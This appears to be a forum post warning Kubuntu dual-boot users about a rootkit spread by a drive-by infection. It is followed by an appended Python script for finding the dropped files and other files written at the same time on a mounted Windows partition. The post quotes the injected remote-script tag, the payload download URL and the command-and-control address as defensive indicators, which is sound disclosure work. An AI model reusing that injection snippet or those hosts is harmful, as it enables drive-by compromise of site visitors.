Reports of an SQL injection attack that affects only Windows computers and leaves behind a root kit...
Normally I don't concern myself with Windows vulnerabilities but I've read where several Kubuntu users also dual boot with Windows. This rootkit is installed by merely browsing the infected web page because the HTML engine will execute this code: "<script src=hxxp://318x.com>" while rendering the page.
Successful exploit leads to the silent delivery of hxxp://windowssp.7766.org/down/down.css. The file ‘down.css’ is actually a Win32 executable that is a variant of the Backdoor.Win32.Buzus family of trojans.
Malware description
Threatname: Backdoor.Win32.Buzus.croo
Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).
Drops the following files to the specified folder:
%UserProfile%\ammxv.drv
%ProgramFiles%\Common Files\Syesm.exe
Modifies the Registry to load when Windows is started:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\DrvKiller
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\DrvKiller\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\DrvKiller
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\DrvKiller\Security
The malware contains a rootkit component which can prevent the dropped files and registry changes from being readily viewable.
Backdoor.Win32.Buzus.croo then attempts to contact 121.14.136.5 via port 80 and sends a POST request to hxxp://dns.winsdown.com.cn/Countdown/count.asp.
I am writing this post to remind Windows users that you can clean your infected Windows partition from your Kubuntu partition and, because the Windows OS is NOT running, the rootkit cannot stop your clean up. Open up Dolphin and click on the disk icon in the places panel to mount and open your Windows partition. Locate the two files:
%UserProfile%\ammxv.drv
%ProgramFiles%\Common Files\Syesm.exe
and write down their timestamp before you delete them. Search your Windows directories for other files with the same year, month, day, hour and minute, plus or minus a couple of minutes. Among the list is the rootkit component. You can rename them in a consistent way, using AAAAnameoffile.extensionoffile.
Reboot Windows. IF it comes up then run regedit.exe and remove the registry entries listed above. If Windows doesn't come up you can reboot into Kubuntu and restore the names of files one at a time, renaming the previous file with the "AAAA" so that only one file is tested at a time, until Windows comes up. Continue running Windows but watch the alert logs for strange "can't find xxxx" messages.
IF the malware has infected your unlabeled 5GB partition where Microsoft stores the Windows backup files that are called upon when you invoke the Windows Repair Utility, then you are hosed. More than likely it means that your MBR is also infected. You have my condolences.
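The offline clean-up above (check for the two dropped files, take the timestamp of one of them, find everything else written within a couple of minutes of it, and rename the candidates with the "AAAA" prefix so they can be restored one at a time) can be done by script from the Kubuntu side instead of by eye in Dolphin. The following is an added example, not code from the post or from any vendor's report. It assumes the Windows volume is already mounted under Linux (the mount point and the `Users\<name>` path are illustrative; XP-era profiles live under `Documents and Settings`, which is also tried) and that the reference file you pass is one of the two paths from the malware description. It only lists matches unless `--rename` is given, and it never renames the reference file itself.

```python
#!/usr/bin/env python3
"""Offline triage of a mounted Windows partition (added example, not from the post).

Assumes the Windows volume is mounted read/write under Linux, e.g. at
/media/windows, and that one dropped file from the report (ammxv.drv or
Syesm.exe) has been located to serve as the timestamp reference.
"""
import os
import stat
import sys
from datetime import datetime

PREFIX = "AAAA"  # quarantine prefix used in the post: AAAAnameoffile.extensionoffile

# Dropped files named in the malware description, relative to the volume root.
# %UserProfile% is expanded per profile directory under Users\ (Vista and later)
# or "Documents and Settings" (XP); both locations are tried.
DROPPED_FILES = [os.path.join("Program Files", "Common Files", "Syesm.exe")]
USER_DROPPED = "ammxv.drv"


def find_dropped(root):
    """Return the dropped-file paths from the report that exist under the mounted volume."""
    found = [os.path.join(root, rel) for rel in DROPPED_FILES
             if os.path.exists(os.path.join(root, rel))]
    for profiles in ("Users", "Documents and Settings"):
        base = os.path.join(root, profiles)
        if not os.path.isdir(base):
            continue
        for user in os.listdir(base):
            p = os.path.join(base, user, USER_DROPPED)
            if os.path.exists(p):
                found.append(p)
    return found


def walk_mtimes(root):
    """Yield (path, mtime) for every regular file under root, skipping unreadable entries."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                yield path, st.st_mtime


def cotemporal(entries, reference_mtime, window_minutes=2):
    """Pure filter: (path, mtime) pairs whose mtime lies within +/- window of the
    reference, oldest first. This is the post's 'same minute, plus or minus a
    couple' search, done by the machine rather than by reading timestamps."""
    window = window_minutes * 60
    hits = [(p, m) for p, m in entries if abs(m - reference_mtime) <= window]
    return sorted(hits, key=lambda e: e[1])


def quarantine_name(path):
    """'dir/foo.sys' -> 'dir/AAAAfoo.sys'; an already-prefixed name is returned unchanged."""
    d, n = os.path.split(path)
    return path if n.startswith(PREFIX) else os.path.join(d, PREFIX + n)


def restore_name(path):
    """Inverse of quarantine_name, for the one-file-at-a-time restore the post describes."""
    d, n = os.path.split(path)
    return os.path.join(d, n[len(PREFIX):]) if n.startswith(PREFIX) else path


def triage(root, reference, window_minutes=2, rename=False):
    """List (and optionally quarantine) files modified near the reference file."""
    ref_mtime = os.lstat(reference).st_mtime
    hits = cotemporal(walk_mtimes(root), ref_mtime, window_minutes)
    for path, mtime in hits:
        when = datetime.fromtimestamp(mtime).strftime("%Y-%m-%d %H:%M:%S")
        print(f"{when}  {path}")
        # The reference file is left alone so it can still be deleted by hand.
        if rename and path != reference:
            os.rename(path, quarantine_name(path))
    return hits


if __name__ == "__main__":
    # usage: triage.py /media/windows "/media/windows/Users/<name>/ammxv.drv" [--rename]
    if len(sys.argv) < 3:
        sys.exit("usage: triage.py <mount-root> <reference-file> [--rename]")
    mount_root, ref = sys.argv[1], sys.argv[2]
    for p in find_dropped(mount_root):
        print("dropped file present:", p)
    triage(mount_root, ref, rename="--rename" in sys.argv[3:])
```

Run it once without `--rename` to review the list; the output sorted by modification time makes the cluster around the drop time obvious, and legitimate files that merely share the minute (Windows Update, prefetch entries) can be excluded before anything is renamed. Because the volume is mounted from Kubuntu, the rootkit's filter driver is not loaded and cannot hide the entries from `os.walk`.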